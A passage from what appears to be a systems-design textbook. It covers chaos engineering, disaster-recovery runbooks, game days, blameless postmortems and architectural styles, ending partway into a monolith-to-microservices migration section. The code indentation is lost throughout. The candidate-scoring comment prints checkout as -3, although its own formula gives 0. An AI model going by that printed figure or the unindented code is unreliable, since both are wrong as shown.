THE CHAOS EXPERIMENT LOOP
1. STEADY STATE Define a measurable normal: "checkout success rate > 99.5%
and p99 < 400 ms", measured continuously.
2. HYPOTHESIS State the expected outcome BEFORE running: "killing one of
three payment-service instances will not change the steady
state, because the LB ejects it within 5 s."
3. BLAST RADIUS Choose the smallest injection that tests the hypothesis:
one instance, one AZ, 1% of traffic, one dependency.
4. ABORT CONDITION Define, in advance and automatically: "roll back if the
success rate drops below 99% for 30 s."
5. INJECT Run the fault. Observe.
6. LEARN Hypothesis held -> confidence, widen the radius next time.
Hypothesis broke -> you found a real defect. Fix, re-run.
class ChaosExperiment:
def __init__(self, name, hypothesis, steady_state, abort_if, blast_radius):
self.name, self.hypothesis = name, hypothesis
self.steady_state = steady_state # callable -> bool
self.abort_if = abort_if # callable -> bool
self.blast_radius = blast_radius
def run(self, inject, revert, duration_s, sample_s=5):
if not self.steady_state():
return "SKIPPED: system was not healthy before the experiment"
inject(self.blast_radius)
try:
for _ in range(duration_s // sample_s):
if self.abort_if():
return f"ABORTED: {self.name} broke the abort condition"
sleep(sample_s)
return ("HELD" if self.steady_state() else "DISPROVED") + f": {self.hypothesis}"
finally:
revert() # ALWAYS revert, even on exception
experiment = ChaosExperiment(
name="payment-instance-loss",
hypothesis="Losing 1 of 3 payment instances does not affect checkout.",
steady_state=lambda: checkout_success_rate(60) > 0.995,
abort_if=lambda: checkout_success_rate(30) < 0.99,
blast_radius={"service": "payments", "instances": 1, "traffic_pct": 100},
)
The useful experiments follow a rough progression, and it is worth running them in this order because each level assumes the previous one works: kill a process; kill an instance; exhaust a resource (CPU, memory, disk, file descriptors); add latency to a dependency; make a dependency return errors; partition the network; lose an entire availability zone; expire a certificate or a credential; and finally, lose a region.
Two organizational points determine whether chaos engineering sticks. It must run in production eventually — staging environments differ in scale, traffic patterns, and data, and the failure modes that matter mostly live in those differences — but it should start in staging, and reach production only once the tooling, abort conditions, and observability are proven. And every experiment should be treated as a test that can regress: automate it, run it continuously, and alert when a hypothesis that used to hold stops holding.
Key Takeaways
- Chaos engineering is controlled experimentation, not randomness: steady state, hypothesis, blast radius, abort condition.
- State the hypothesis before injecting; a surprise is the finding.
- Start small and in staging; graduate to production, where the failure modes that matter actually live.
- Progress from process kills to resource exhaustion to dependency latency to zone and region loss.
- Automate experiments so a regression in resilience is caught like any other regression.
🧪 Practice
- Write a full experiment definition — steady state, hypothesis, blast radius, abort condition — for adding 500 ms of latency to a cache.
- Explain why an experiment must verify the steady state before injecting, and what a skipped run tells you.
- Interview: Leadership refuses to allow chaos experiments in production. What do you propose? (Hint: what smaller-radius, lower-stakes version would build the evidence needed to change that decision?)
Disaster Recovery Planning
Disaster recovery is what happens when the resilience patterns are not enough: a region is gone, a database is unrecoverable, a bad migration destroyed a table, or a credential compromise requires rotating everything at once. DR planning is the work of deciding, in advance and calmly, what you will do — because the defining property of a disaster is that nobody will be thinking clearly when it starts.
A DR plan is built from the objectives set earlier: for each system, its RTO and RPO, its recovery mechanism, and the specific procedure that achieves them. What distinguishes a plan that works from a document that exists is whether it is specific enough to be executed by someone who did not write it, at 4 a.m., under pressure, possibly without access to the systems they normally use.
| Disaster class | Typical trigger | Primary defense |
|---|---|---|
| Infrastructure loss | Zone or region outage | Multi-zone/region failover |
| Data loss | Storage failure, deletion | Backups, PITR, replication |
| Data corruption | Bad migration, application bug | Versioned backups, PITR |
| Dependency loss | Provider outage, expired contract | Fallbacks, second provider |
| Security incident | Compromised credentials or supply chain | Rotation, isolation, forensics |
| Human error | Accidental deletion or config push | Soft delete, staged rollout, undo |
# A DR runbook expressed as executable structure, so it can be tested in CI
# and rehearsed as code rather than read as prose.
RUNBOOK = {
"name": "primary-database-region-loss",
"rto_target_min": 30,
"rpo_target_min": 5,
"preconditions": [
"standby replica lag < 5 min", # verified continuously
"standby has current schema version",
"DNS TTL for db endpoint <= 60 s", # bounds client convergence
],
"steps": [
("verify", "confirm primary is unreachable from 2 independent probes"),
("fence", "revoke primary's write credentials"), # prevents split-brain
("promote", "promote standby, record new epoch/fencing token"),
("repoint", "update service discovery + DNS to the new primary"),
("verify", "run smoke tests: read, write, and read-your-write"),
("scale", "scale the standby region's app tier to full capacity"),
("announce", "update status page and notify support"),
],
"rollback": "do NOT fail back automatically; the old primary may hold writes "
"that were never replicated -- reconcile them manually first",
"last_rehearsed": "2026-07-14", # a plan not rehearsed this quarter is
# an untested assumption
}
Three things are consistently missing from DR plans and consistently needed during disasters. Access: the credentials, VPN, and consoles required to execute the plan must not themselves depend on the system that is down — a plan that requires logging in through the failed SSO provider is not a plan. Communication: who declares the disaster, who has authority to trigger an irreversible failover, and where the team coordinates when the usual chat tool is part of the outage. Decision criteria: the specific, measurable condition under which you fail over rather than continue trying to repair, because the most expensive DR mistake is spending ninety minutes hoping the primary recovers.
Finally, treat fail-back as a separate plan needing its own care. Returning to the original region after a failover involves reconciling divergent data and is usually more dangerous than the failover itself; it should be scheduled deliberately, not performed in the middle of an incident.
Key Takeaways
- A DR plan turns RTO and RPO into a specific procedure, executable by someone who did not write it.
- Cover data corruption and human error, not only infrastructure loss — they need different mechanisms.
- Recovery access must not depend on the failed system, including SSO, VPN, and chat.
- Define in advance who declares a disaster and the measurable condition that triggers failover.
- Fail-back is a separate, more dangerous procedure; plan and schedule it apart.
🧪 Practice
- Write the preconditions and steps for recovering from an accidentally dropped production table.
- Identify every credential or tool your DR procedure requires and check whether each survives the failure it is meant to address.
- Interview: Your primary region has been degraded for 20 minutes with no ETA. Do you fail over? (Hint: the answer should not depend on your mood — what should have been decided beforehand?)
Game Days and Failure Drills
A game day is a scheduled exercise in which a team responds to a simulated incident, end to end, using the real tools and the real runbooks. Chaos experiments test the system; game days test the sociotechnical system — the people, the documentation, the alerting, the escalation paths, and the handoffs. Most incident time is spent on detection, coordination, and decision-making, and those are exactly the parts that only a drill exercises.
The value comes from the gaps a drill exposes, which are reliably mundane and reliably serious: the runbook references a dashboard that was deleted; the on-call engineer lacks the permission the procedure requires; the alert fires to a channel nobody watches; the failover script has a syntax error introduced six months ago; nobody knows who is allowed to approve a customer-facing status update. None of these show up in design reviews, and all of them cost real minutes during a real outage.
GAME DAY STRUCTURE (a half-day exercise)
BEFORE
- Choose a scenario tied to a real risk, not an exotic one
- Decide the environment: production (highest fidelity, needs maturity)
or a production-like staging environment
- Assign roles: facilitator, incident commander, responders, scribe,
and an observer whose only job is to note friction
- Announce it. A surprise drill tests fear responses, not procedures.
DURING
- Facilitator injects the fault and answers questions in character
("the dashboard shows X") without giving away the cause
- Responders follow the real runbooks, using the real tools
- Scribe records a timeline with timestamps: every observation, decision,
and action -- the timeline is the primary artifact
- Facilitator can inject complications: "the on-call is unreachable",
"the status page is also down"
AFTER
- Debrief within 24 hours, while memory is fresh
- Produce action items with owners and dates, exactly as for a real
incident -- an undone action item makes the next drill pointless
- Measure: time to detect, time to diagnose, time to mitigate
# Tracking whether drills are actually improving response, not just occurring.
DRILLS = [
# scenario date detect_min mitigate_min gaps_found
("az-loss", "2026-02-10", 8, 31, 6),
("db-failover", "2026-03-24", 12, 44, 9),
("az-loss", "2026-05-19", 3, 14, 2), # repeat
("dependency-brownout", "2026-07-07", 15, 52, 11),
]
for name, date, detect, mitigate, gaps in DRILLS:
print(f"{date} {name:24} detect {detect:>3}m mitigate {mitigate:>3}m gaps {gaps}")
# The repeated az-loss scenario is the useful signal: detection fell from 8 to
# 3 minutes and mitigation from 31 to 14, which means the action items from the
# first run were actually completed. Repeat scenarios deliberately -- a drill
# you never repeat cannot show improvement.
A few practical rules. Rotate the incident commander so expertise is not concentrated in one person who will inevitably be on holiday. Include the adjacent functions — support, communications, and whoever owns the status page — because their part of the response is usually the least rehearsed. Start with announced drills in staging and progress toward less-announced drills in production only as confidence grows. And treat the action items as real work with owners and deadlines; a drill whose findings are never fixed is theatre that consumes a day and improves nothing.
Key Takeaways
- Game days test people, runbooks, alerting, and escalation — the parts of incident response that chaos experiments do not touch.
- The gaps found are usually mundane and expensive: stale runbooks, missing permissions, unwatched alert channels.
- Assign explicit roles, and have a scribe produce a timestamped timeline.
- Repeat scenarios so improvement is measurable in detection and mitigation time.
- Action items must have owners and dates, or the exercise is theatre.
🧪 Practice
- Design a two-hour game day for the loss of a critical third-party dependency, including roles and the complications the facilitator can inject.
- Take an existing runbook and list every assumption it makes about access, tooling, and available people.
- Interview: How would you run a game day for a team that has never done one, without breaking anything? (Hint: fidelity and risk are separate dials — which can you turn down first?)
Blameless Postmortems
A postmortem is the written analysis produced after an incident. "Blameless" means it is written on the premise that everyone involved acted reasonably given the information they had at the time, and that the useful question is therefore never "who did this" but "what made this the reasonable thing to do, and what would have made the harm impossible."
The justification is practical, not sentimental. Systems fail in ways that make the failing action look sensible from inside; hindsight makes it look obvious only because you now know the outcome. More importantly, blame changes behaviour in exactly the wrong direction: in a blaming culture people delay reporting, describe events vaguely, avoid touching fragile systems, and stop volunteering the details that would have prevented a recurrence. The information you need to fix the system is held by the people a blaming process punishes.
"Blameless" does not mean "consequence-free" or "no owners." Action items have owners and deadlines. What is removed is the search for a person to hold responsible for the outcome, and it is replaced with a search for the conditions that allowed the outcome.
THE SAME EVENT, TWO FRAMINGS
BLAMING
"An engineer ran a migration without checking the row count, which locked
the table for 40 minutes. Reminded the team to be careful with migrations."
-> Learns nothing. Nothing changes. Next engineer makes the same mistake.
BLAMELESS
"A migration acquired an exclusive lock on a 400M-row table for 40 minutes.
Contributing conditions:
- The migration tool gives no warning about lock duration or table size.
- Staging holds 10K rows, so the migration ran there in under a second.
- There is no lock-timeout default, so the lock could be held unbounded.
- No alert exists for lock waits, so detection came from user reports.
Actions:
- Set lock_timeout on all migrations (owner: A, due: 03-14)
- Warn in CI when a migration targets a table over 1M rows (owner: B)
- Seed staging with production-scale row counts (owner: C)
- Alert on lock wait time over 30 s (owner: D)"
-> Four defenses added. The same mistake now cannot cause the same outage.
A useful postmortem has a predictable structure: a short summary; user impact stated in concrete terms (how many users, which functionality, for how long, what it cost); a timestamped timeline from first anomaly to resolution; the analysis of contributing conditions; what went well, which matters because it identifies the defenses worth keeping; and action items with owners and dates. The timeline is the most valuable section, and the most commonly rushed — it is what exposes that detection took 22 of the incident's 45 minutes.
# Postmortem metrics turn individual incidents into a trend you can act on.
def incident_phases(timeline):
"""timeline: dict of phase -> minutes"""
total = sum(timeline.values())
for phase, minutes in timeline.items():
print(f"{phase:12} {minutes:>4} min ({minutes / total:>5.1%})")
return total
incident_phases({
"detect": 22, # from first user impact to a human being aware
"diagnose": 15, # from awareness to knowing what to do
"mitigate": 6, # from decision to impact ending
"resolve": 90, # from mitigation to full repair (not user-visible)
})
# detect 22 min (16.5%)
# diagnose 15 min (11.3%)
# mitigate 6 min ( 4.5%)
# resolve 90 min (67.7%)
#
# Detection dominates the USER-VISIBLE portion (22 of 43 minutes). Investing in
# alerting would cut this incident's impact roughly in half; investing in a
# faster fix would not, because the fix was already quick once identified.
Two habits keep postmortems from becoming an archive nobody reads. Ask "why was this possible?" repeatedly rather than stopping at the first plausible cause — "the deploy was bad" is a stopping point, "a bad deploy could reach 100% of traffic in 90 seconds with no automatic rollback" is a finding. And track action items to completion with the same seriousness as feature work: the single strongest predictor of repeat incidents is a backlog of postmortem actions nobody closed.
Key Takeaways
- Blameless means assuming people acted reasonably given what they knew, and analysing the conditions instead of the person.
- Blame suppresses the information the process depends on; it makes future incidents more likely, not fewer.
- Blameless still means owners and deadlines for action items — it removes punishment, not accountability.
- A timestamped timeline is the highest-value section; it exposes where the time actually went, which is usually detection.
- Keep asking why the failure was possible until you reach a systemic condition, and close the action items.
🧪 Practice
- Rewrite a blaming incident summary ("X pushed a bad config") into a blameless analysis with at least three contributing conditions.
- Build a phase breakdown for a past incident you know and identify which phase would benefit most from investment.
- Interview: An engineer's change caused a major outage. What does the postmortem say about them? (Hint: consider what the process should optimize for — the appearance of accountability, or the outage never being possible again.)
<a id="10-architectural-patterns-and-styles"></a>
10. Architectural Patterns and Styles
Everything in the previous chapters — storage, caching, messaging, consistency, resilience — has to be arranged into a shape, and that shape is the architecture. This chapter covers the major styles a system can take: the monolith and its internal structuring patterns, the service-oriented decomposition that often replaces it, the event-driven models that let services cooperate without calling each other, and the cloud-native and serverless platforms that changed what a deployable unit even is. The recurring lesson is that these styles are not a ladder from primitive to advanced but a set of trades between coupling, operational cost, and the number of independent teams a system must support.
<a id="101-monolithic-and-layered-architectures"></a>
10.1 Monolithic and Layered Architectures
A monolith is a single deployable unit containing all of an application's functionality. This subchapter looks at what that actually buys and costs, the internal structuring patterns that keep a large codebase from turning to mud, and the disciplined ways out when a monolith genuinely stops fitting.
Monolith Structure and Trade-offs
A monolithic application is one where all the code ships together: one build, one artifact, one process type, usually one database. Everything talks to everything else through in-process function calls. The style has a poor reputation, which is largely undeserved — the reputation belongs to badly structured monoliths, and a badly structured distributed system is considerably worse.
The reason to start here is that the monolith is the default that every other style has to justify beating. Consider what a function call gives you for free. It takes nanoseconds, it cannot be partially delivered, it either returns or throws, it never needs a retry policy, it joins the caller's database transaction, and a compiler checks both sides of it. Turning that call into a network hop trades away every one of those properties in exchange for the ability to deploy and scale the two halves separately. That is sometimes an excellent trade. It is never a free one.
MONOLITH DISTRIBUTED SERVICES
+---------------------------+ +--------+ +--------+ +---------+
| one process | | orders |->| pricing|->|inventory|
| orders -> pricing | +--------+ +--------+ +---------+
| | | | | | |
| v v | v v v
| inventory -> shipping | +------+ +------+ +------+
+---------------------------+ | db_o | | db_p | | db_i |
| +------+ +------+ +------+
+-----------+
| one DB | call: nanoseconds -> milliseconds
+-----------+ failure: exception -> timeout, partial state
txn: ACID -> saga + compensation
deploy: one unit -> N independent units
The trade-offs split cleanly into what a monolith is good at and what it is bad at, and both lists sharpen as the organization grows.
| Dimension | Monolith | Distributed services |
|---|---|---|
| Local development | Clone, run, done | Run N services or mock them |
| Cross-cutting change | Compiler-verified rename | Coordinated deploys, versioned contracts |
| Transactions | One ACID transaction | Sagas and compensation (see 8.5) |
| Debugging | One stack trace | Distributed tracing across hops |
| Deploy blast radius | The whole application | One service |
| Scaling granularity | Everything scales together | Scale only the hot component |
| Team autonomy | Shared codebase, shared release | Independent release per team |
| Failure isolation | A memory leak takes down all of it | A sick service can be shed |
| Technology choice | One stack | Per-service choice (a cost as well as a perk) |
The scaling row deserves a second look, because it is the argument most often made and most often misapplied. A monolith scales horizontally perfectly well — run more copies behind a load balancer. What it cannot do is scale one part independently, and that only matters when the resource profiles genuinely differ.
# When does per-component scaling actually pay?
# Peak load and per-request CPU cost differ wildly across features.
COMPONENTS = {
# name rps, cpu_ms_per_request
"checkout": (200, 40),
"catalog": (9000, 5),
"image_resize": (50, 2000), # rare, but brutally expensive
}
CPU_MS_PER_CORE = 1000
def cores(rps, cpu_ms):
return rps * cpu_ms / CPU_MS_PER_CORE
per_component = {n: cores(r, c) for n, (r, c) in COMPONENTS.items()}
print(per_component)
# {'checkout': 8.0, 'catalog': 45.0, 'image_resize': 100.0}
# A monolith must run enough identical copies to serve the WHOLE profile, and
# every copy carries every component's memory footprint and dependencies.
print(sum(per_component.values())) # 153.0 cores of demand
print(per_component["image_resize"]) # 100.0 of them, from 0.5% of traffic
#
# THAT is a scaling argument: one outlier dominates compute and can be pulled
# out on its own. "Catalog gets more traffic than checkout" is not an argument
# -- both are cheap, and identical copies of the monolith serve both fine.
The real limit of a monolith is usually organizational rather than technical. One codebase with one release train means every team's changes queue behind every other team's. With five engineers that is a non-issue; with two hundred it is the dominant cost, and the coordination overhead starts to exceed the operational overhead of running separate services. That crossover — not requests per second — is the honest trigger for decomposition.
Key Takeaways
- A monolith is one deployable unit whose components communicate by in-process calls, which gives speed, ACID transactions, and compile-time contracts free.
- Splitting into services trades those guarantees for independent deployment, scaling, and failure isolation: a real trade, never a free upgrade.
- Monoliths scale horizontally fine; what they cannot do is scale one component independently, which only matters when resource profiles genuinely differ.
- The usual breaking point is organizational — one release train shared by many teams — not load.
- Most "monolith problems" are structure problems, fixable without distributing anything.
🧪 Practice
- List five guarantees a function call provides that a network call does not, and name the mechanism each one requires once the call crosses a process.
- Take a feature in a system you know, estimate its peak RPS and per-request CPU, and decide whether extracting it would meaningfully change capacity.
- Interview: A team wants microservices because "the monolith doesn't scale". What do you ask before agreeing? (Hint: separate the compute argument from the deployment-coordination argument and find out which one they feel.)
Layered Architecture
Layered architecture is the oldest and most widely used way to impose structure inside a single application. Code is grouped by technical responsibility, and dependencies are allowed in only one direction: presentation depends on application logic, which depends on domain logic, which depends on data access. Nothing depends upward.
The reason for the one-way rule is that dependency direction determines what you can change safely and what you can test in isolation. If the domain never imports the web framework, business rules can be tested without an HTTP server; if data access never imports the domain, an ORM can be swapped without touching business rules. Layers buy that independence with a rule simple enough that a linter can enforce it.
+--------------------------------------------+
| Presentation HTTP handlers, CLI, gRPC | serialization, status codes
+--------------------------------------------+
| depends on
v
+--------------------------------------------+
| Application use cases, orchestration | transactions, workflow
+--------------------------------------------+
| depends on
v
+--------------------------------------------+
| Domain entities, business rules | no framework imports
+--------------------------------------------+
| depends on
v
+--------------------------------------------+
| Persistence repositories, SQL, clients | storage details
+--------------------------------------------+
Rule: arrows point DOWN only. An upward import is an architecture bug.
# A layered slice of "place an order". Note what each layer is allowed to know.
# ---- domain: pure rules, no framework, no I/O ------------------------------
class Order:
def __init__(self, items, customer_tier):
self.items = items
self.customer_tier = customer_tier
def total(self):
gross = sum(i["price"] * i["qty"] for i in self.items)
discount = 0.10 if self.customer_tier == "gold" else 0.0
return round(gross * (1 - discount), 2) # a rule, testable alone
# ---- persistence: knows storage, knows nothing about HTTP ------------------
class OrderRepository:
def __init__(self, conn):
self.conn = conn
def save(self, order_id, order):
self.conn.execute("INSERT INTO orders (id, total) VALUES (?, ?)",
(order_id, order.total()))
# ---- application: orchestrates the use case and owns the transaction -------
class PlaceOrder:
def __init__(self, repo, payments):
self.repo, self.payments = repo, payments
def execute(self, cmd):
order = Order(cmd["items"], cmd["tier"])
self.payments.charge(cmd["customer_id"], order.total())
self.repo.save(cmd["order_id"], order)
return {"order_id": cmd["order_id"], "total": order.total()}
# ---- presentation: protocol only; no business rules live here --------------
def http_post_orders(request, place_order: PlaceOrder):
try:
return 201, place_order.execute(request.json) # delegate, do not decide
except ValueError as e:
return 400, {"error": str(e)} # translate to protocol
Two failure modes are worth naming. The first is anaemic layering, where each layer is a pass-through: the handler calls a service that calls a repository, each adding a file and nothing else. That is ceremony, not structure. The second is the sinkhole, where domain objects are just data bags and the rules end up in the application layer or, worse, in HTTP handlers — at which point the layer names document nothing.
Layering also has a structural limitation: it slices by technology, so one feature is smeared across all of it. Changing "how orders work" touches four directories, while changing "how we persist things" touches one. That is the right trade when technical concerns churn and the wrong one when features churn, which is exactly what motivates the modular approach two topics down.
Key Takeaways
- Layers group code by technical responsibility and allow dependencies in one direction only; the one-way rule is what makes isolation and testing possible.
- "The domain imports no framework" is the highest-value constraint — enforce it with a linter or an architecture test, not with a convention.
- Pass-through layers that only forward calls add ceremony without structure.
- Layering slices by technology, so a feature change touches every layer; that is its main weakness.
🧪 Practice
- Take an HTTP handler that contains business rules and split it into presentation, application, and domain pieces without changing behaviour.
- Write a test that fails if any file in the domain package imports a web or database library; a simple import scan is enough.
- Interview: When is strict layering the wrong choice? (Hint: think about what a typical change request touches, and whether that maps to one layer or all of them.)
Modular Monoliths
A modular monolith keeps the single deployable unit but slices the code by business capability rather than by technical layer, and enforces boundaries between those slices as strictly as if they were separate services. It exists because the industry noticed that most monolith pain came from missing internal boundaries and most microservice pain came from the network — which raises the obvious question of whether you can have the boundaries without the network.
The mental model is a set of modules, each owning its data and exposing a narrow published interface. Inside a module, layers can be as elaborate or as thin as that module needs. Across modules, only the published interface is legal: no reaching into another module's internals, and critically, no reaching into another module's tables.
LAYERED (slice by technology) MODULAR (slice by capability)
+--------------------------------+ +---------+ +---------+ +---------+
| web: orders, catalog, billing | | Orders | | Catalog | | Billing |
+--------------------------------+ | web | | web | | web |
| svc: orders, catalog, billing | | logic | | logic | | logic |
+--------------------------------+ | data | | data | | data |
| dao: orders, catalog, billing | +----+----+ +----+----+ +----+----+
+--------------------------------+ | | |
| +-- published API ----+
one schema, shared (in-process calls or an
freely by everything internal event bus)
A feature change touches A feature change touches
every layer. one module.
// A published interface plus a package-private implementation is the cheapest
// boundary a language will enforce for you.
// ---- orders module: the ONLY type other modules may see --------------------
package com.shop.orders;
public interface OrdersApi { // public: this is the contract
OrderSummary place(PlaceOrderCommand cmd);
OrderSummary find(String orderId);
}
// ---- implementation is package-private: unreachable from other packages ----
package com.shop.orders;
class OrderService implements OrdersApi { // note: no 'public' modifier
private final OrderRepository repo; // internal, invisible outside
public OrderSummary place(PlaceOrderCommand cmd) { /* ... */ }
public OrderSummary find(String orderId) { /* ... */ }
}
// ---- billing module may depend on the interface, never the internals -------
package com.shop.billing;
import com.shop.orders.OrdersApi; // legal
// import com.shop.orders.OrderRepository; // does not compile: not public
class InvoiceService {
private final OrdersApi orders; // talks through the contract
}
The hard part is data. Modules sharing one physical database drift toward sharing
tables, and a shared table is the most binding coupling there is — invisible to
the compiler, discovered only when someone's migration breaks someone else's
query. The discipline that makes modular monoliths work is schema-per-module:
each module owns its tables, and cross-module reads go through the published API
even though a JOIN would technically work.
-- Enforce data ownership with schemas and grants, not with good intentions.
CREATE SCHEMA orders;
CREATE SCHEMA billing;
CREATE TABLE orders.orders (id uuid PRIMARY KEY, total numeric);
CREATE TABLE billing.invoices (id uuid PRIMARY KEY, order_id uuid, amount numeric);
-- Deliberately NO foreign key from billing.invoices to orders.orders: a
-- cross-module FK is exactly the coupling that makes later extraction hard.
CREATE ROLE billing_module;
GRANT USAGE ON SCHEMA billing TO billing_module;
GRANT SELECT, INSERT, UPDATE ON ALL TABLES IN SCHEMA billing TO billing_module;
-- and deliberately not: GRANT USAGE ON SCHEMA orders TO billing_module;
-- The database now rejects the shortcut a code review might miss.
The payoff is optionality. A modular monolith that respects its boundaries can have any module lifted out into a service later, because the call sites already go through an interface and the data is already separated — extraction becomes a transport change rather than a rewrite. This makes it the best default for most new systems: the deployment simplicity of a monolith, with the option to distribute the parts that eventually earn it.
Key Takeaways
- A modular monolith slices by business capability, enforces module boundaries, and still ships as one deployable unit.
- The published-interface rule needs language-level enforcement — package visibility, a module system, or architecture tests — to survive deadlines.
- Data ownership matters more than code structure: schema-per-module with no cross-module foreign keys is what keeps future extraction cheap.
- It is the best default for new systems: most of the boundary benefit, none of the network cost, and a short path to services later.
🧪 Practice
- Re-group a layered codebase's directories by capability and list every import that would become illegal under a published-interface rule.
- Design the schema split for a system with users, orders, and payments, stating what replaces each cross-module foreign key you had to remove.
- Interview: If a modular monolith gives most of the benefits, why does anyone run microservices? (Hint: think about what one deployable unit still forces teams to share, and what independent scaling of one module would require.)
Hexagonal and Clean Architecture
Hexagonal architecture — also called ports and adapters, and closely related to Clean and Onion architecture — is a refinement of layering that fixes its awkwardest part. In classic layering the domain sits above persistence and therefore depends on it, so business rules end up importing database concepts. Hexagonal architecture inverts that: the domain declares interfaces (ports) describing what it needs, and infrastructure supplies implementations (adapters) that plug into them. All dependencies point inward.
The analogy is a household appliance. The appliance defines a plug shape; mains power, a generator, or a battery pack can all fill it, and the appliance never imports the power station. In the same way, an order use case declares "I need something that can save an order", and Postgres, DynamoDB, or an in-memory fake each satisfy it — with identical domain code in all three cases, which is why tests become both fast and honest.
driving (primary) adapters
HTTP CLI gRPC test harness
\ | / /
v v v v
+--------------------------------------+
| PORTS (in) |
| +------------------------------+ |
| | DOMAIN + USE CASES | |
| | depends on NOTHING outside | |
| +------------------------------+ |
| PORTS (out) |
+--------------------------------------+
^ ^ ^ ^
/ | \ \
Postgres Kafka Stripe in-memory fake
driven (secondary) adapters
Every arrow points INWARD. Infrastructure knows the domain;
the domain does not know infrastructure.
from abc import ABC, abstractmethod
# ---- PORT (out): defined BY the domain, in the domain's vocabulary ---------
class OrderStore(ABC):
@abstractmethod
def save(self, order: dict) -> None: ...
@abstractmethod
def by_customer(self, customer_id: str) -> list: ...
# Vocabulary check: no "row", no "query", no "session". If the port leaks
# storage concepts, the inversion has failed.
class PaymentGateway(ABC):
@abstractmethod
def charge(self, customer_id: str, amount: float) -> str: ...
# ---- USE CASE: pure logic that depends only on ports -----------------------
class PlaceOrder:
def __init__(self, store: OrderStore, payments: PaymentGateway):
self.store, self.payments = store, payments # injected, not imported
def execute(self, customer_id, items):
total = sum(i["price"] * i["qty"] for i in items)
if total <= 0:
raise ValueError("empty order")
receipt = self.payments.charge(customer_id, total)
self.store.save({"customer_id": customer_id, "total": total,
"receipt": receipt})
return receipt
# ---- ADAPTERS (driven): infrastructure implements the domain's interface ---
class PostgresOrderStore(OrderStore):
def __init__(self, conn): self.conn = conn
def save(self, order):
self.conn.execute(
"INSERT INTO orders (customer_id, total, receipt) VALUES (%s,%s,%s)",
(order["customer_id"], order["total"], order["receipt"]))
def by_customer(self, customer_id):
return self.conn.query("SELECT * FROM orders WHERE customer_id = %s",
(customer_id,))
class InMemoryOrderStore(OrderStore): # a first-class adapter
def __init__(self): self.rows = []
def save(self, order): self.rows.append(order)
def by_customer(self, cid):
return [r for r in self.rows if r["customer_id"] == cid]
class FakePayments(PaymentGateway):
def charge(self, customer_id, amount): return "rcpt_test"
# ---- The test needs no database, no network, no container ------------------
def test_place_order_records_total():
store = InMemoryOrderStore()
PlaceOrder(store, FakePayments()).execute("c1", [{"price": 10.0, "qty": 2}])
assert store.rows[0]["total"] == 20.0
Clean Architecture is the same principle with a prescribed set of rings (entities, use cases, interface adapters, frameworks) and one explicit law: the dependency rule — source dependencies may point only inward, and nothing in an inner ring may know the name of anything in an outer ring. Data crossing a boundary crosses as a simple structure owned by the inner ring, never as an ORM entity or a framework request object.
The cost is indirection: more interfaces, more wiring, and a composition root that assembles the real adapters at startup. For a CRUD service with no interesting rules that is overhead with no return. The pattern pays when domain logic is genuinely complex, when it must outlive its infrastructure, or when fast, dependency-free tests are worth real money.
| Concern | Classic layered | Hexagonal / Clean |
|---|---|---|
| Dependency arrow | Domain -> persistence | Persistence -> domain (inverted) |
| Interface owner | Infrastructure defines it | The domain defines the port |
| Swapping a store | Touches domain code | Write a new adapter |
| Unit tests | Need a DB or heavy mocks | In-memory adapters, no I/O |
| Cost | Low | Extra interfaces and wiring |
Key Takeaways
- Hexagonal architecture inverts the layered dependency so infrastructure depends on the domain, never the reverse.
- Ports are interfaces the domain defines in its own vocabulary; adapters are the infrastructure implementations that plug into them.
- The dependency rule — inner rings never name outer rings — is the whole idea; the rest is naming.
- The practical payoff is tests that run with no I/O and infrastructure that can be replaced without touching business rules.
- It is overhead for thin CRUD services; use it where domain logic is real.
🧪 Practice
- Find a class that imports both business rules and a database client, and split it into a port, an adapter, and a use case.
- Write an in-memory adapter for one repository interface and convert one integration test into a unit test with it.
- Interview: What is the difference between a port and a repository interface that happens to live in the data layer? (Hint: ask who defines the interface and whose vocabulary it is written in — that is the whole distinction.)
Monolith-to-Microservices Migration
Migration is where architecture meets project management, and it fails far more often from sequencing mistakes than from technical ones. The governing principle is that a migration must deliver value continuously, because a rewrite that delivers nothing for eighteen months gets cancelled at month fourteen with the old system still running and a half-built new one to maintain.
The first question is not "how" but "whether, and which". Extraction is justified for a component when at least one of these is concretely true: it needs to scale differently, it changes at a very different rate, it has a different reliability or compliance requirement, or a distinct team wants to own its release cadence. "It feels like a separate thing" is not on the list.
# Score candidates before touching code. The point is to rank, not to be exact.
CANDIDATES = {
# name coupling churn scale_diff team_boundary risk
"reporting": (2, 3, 4, 4, 1),
"image_resize": (1, 1, 5, 2, 1),
"user_profile": (4, 2, 1, 2, 3),
"checkout": (5, 5, 2, 3, 5),
}
# coupling : how many other components read its data (LOWER is easier)
# churn / scale_diff / team_boundary (HIGHER is more benefit)
# risk : blast radius if the extraction goes wrong (LOWER is safer)
def score(c):
coupling, churn, scale, team, risk = c
return (churn + scale + team) - (coupling + risk)
for name, c in sorted(CANDIDATES.items(), key=lambda kv: -score(kv[1])):
print(f"{name:14} {score(c):+d}")
# reporting +8 read-mostly and isolated: an ideal first cut
# image_resize +6 low coupling, huge scale difference: extract early
# user_profile -2
# checkout -3 highest value AND highest coupling: extract LAST
#
# The common mistake is starting with checkout because it matters most. Start
# where coupling is lowest, so the team learns the mechanics cheaply.
The sequence that repeatedly works looks like this:
1. Modularize IN PLACE draw the boundary inside the monolith first; fix
the imports and the shared tables there, where a
mistake costs a compile error, not an outage
2. Split the data give the module its own schema; remove cross-boundary
joins and foreign keys; it now reads only its own data
3. Introduce the seam route every caller through one interface or facade
4. Extract the service move the code behind the seam out of process; the
facade becomes an HTTP or gRPC client
5. Migrate traffic shadow, compare, shift a percentage at a time, and
keep the old path switchable for at least a release
6. Delete the old path the step teams skip, which is why they end up
maintaining both forever
Step 2 is where migrations actually die. Code is easy to move; data is not. Splitting a table that four features join against means finding every join and deciding, for each, whether the data should be duplicated, referenced by ID, or fetched through an API — and accepting that some queries become two calls plus an in-memory merge. Doing that before a network exists means every mistake shows up as a failing test rather than a production incident.
Two safety nets are worth the effort. Shadowing sends the same request to both implementations, returns the old result, and logs divergences, so you learn whether the new service is correct under real traffic while risking nothing. A flagged switch at the seam then lets you shift 1%, 10%, 100%, and back again in seconds if error rates move.
import random
def place_order(cmd, old_impl, new_client, pct_to_new, log):
old_result = old_impl(cmd)
new_result = None
try:
new_result = new_client(cmd) # shadow: always exercised
if new_result != old_result:
log.warn("divergence", id=cmd["id"], old=old_result, new=new_result)
except Exception as e:
log.warn("new_path_error", id=cmd["id"], error=str(e))
# Cutover: only a controlled share of traffic is SERVED the new answer.
if new_result is not None and random.random() * 100 < pct_to_new:
return new_result
return old_result
